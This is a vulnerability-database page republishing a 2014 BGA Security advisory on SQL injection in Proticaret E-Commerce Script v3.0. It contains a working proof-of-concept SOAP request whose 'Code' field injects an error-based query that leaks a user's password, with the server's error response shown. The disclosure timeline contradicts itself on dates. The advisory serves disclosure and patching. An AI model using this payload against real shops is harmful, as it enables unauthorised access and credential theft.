Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Proticaret E-Commerce Script 3.0 - SQL Injection (1)

🗓️ 13 Nov 2014 00:00:00Reported by Onur Alanbel (BGA)Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 25 Views

Proticaret E-Commerce Script v3.0 SQL Injection Vul

Code
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
===========
13 Nov 2014

Product & Service Introduction:
========================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0

Vulnerability Disclosure Timeline:
=========================
20 Oct 2014	:	Contact with Vendor
20 Nov 2014	:	Vendor Response
June 26, 2014 	:	Patch Released
13 Nov 2014	:	Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
==================
Remote, Unauthenticated


Severity Level:
===========
Critical

Technical Details & Description:
========================
SQL Injection

Proof of Concept (PoC):
==================
Proof of Concept

Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-	-</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>


Solution Fix & Patch:
================
Apply the patch for v3.0

Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
			
Domain:	www.bga.com.tr
Social:		twitter.com/bgasecurity
Contact:	[email protected]
	
Copyright © 2014 | BGA

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Nov 2014 00:00Current
7.4High risk
Vulners AI Score7.4
proticarete-commercesql injectionbga securitycriticalpatch
25